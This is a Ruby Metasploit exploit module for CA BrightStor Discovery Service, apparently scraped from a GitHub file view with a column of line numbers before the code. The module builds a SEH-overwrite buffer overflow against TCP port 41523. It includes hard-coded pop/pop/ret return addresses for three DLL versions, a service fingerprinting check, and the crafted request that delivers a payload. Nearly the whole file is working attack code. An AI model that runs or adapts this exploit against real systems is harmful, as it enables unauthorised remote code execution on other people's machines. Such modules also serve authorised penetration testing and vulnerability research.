/
discovery_tcp.rb
141 lines (122 loc) · 3.83 KB
/
discovery_tcp.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Discovery Service TCP Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a specific
type of request is sent to the TCP listener on port 41523.
This vulnerability was discovered by cybertronic[at]gmx.net
and affects all known versions of the BrightStor product.
This module is based on the 'cabrightstor_disco' exploit by
HD Moore.
},
'Author' => [ 'hdm', 'aushack' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2005-2535'],
[ 'OSVDB', '13814'],
[ 'BID', '12536'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
[ 'EDB', '1131']
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => %w{ win },
'Targets' =>
[
[
'cheyprod.dll 9/14/2000', # Build 1220.0 9/14/2000 7.0.1220.0
{
'Platform' => 'win',
'Ret' => 0x23803b20, # pop/pop/ret
'Offset' => 1032,
},
],
[
'cheyprod.dll 12/12/2003',
{
'Platform' => 'win',
'Ret' => 0x23805714, # pop/pop/ret
'Offset' => 1024,
},
],
[
'cheyprod.dll 07/21/2004',
{
'Platform' => 'win',
'Ret' => 0x23805d10, # pop/pop/ret
'Offset' => 1024,
},
],
],
'DisclosureDate' => '2005-02-14',
'DefaultTarget' => 1))
register_options(
[
Opt::RPORT(41523)
])
end
def check
# The first request should have no reply
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('META')
x = csock.get_once(-1, 3)
csock.close
# The second request should be replied with the host name
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('hMETA')
y = csock.get_once(-1, 3)
csock.close
if (y and not x)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Trying target #{target.name}...")
buf = rand_text_english(4096)
# Overwriting the return address works well, but the only register
# pointing back to our code is 'esp'. The following stub overwrites
# the SEH frame instead, making things a bit easier.
seh = generate_seh_payload(target.ret)
buf[target['Offset'], seh.length] = seh
# Make sure the return address is invalid to trigger SEH
buf[ 900, 100] = (rand(127)+128).chr * 100
# SERVICEPC is the client host name actually =P (thanks Juliano!)
req = "\x9b" + 'SERVICEPC' + "\x18" + [0x01020304].pack('N') + 'SERVICEPC' + "\x01\x0c\x6c\x93\xce\x18\x18\x41"
req << buf
sock.put(req)
sock.get_once
handler
disconnect
end
end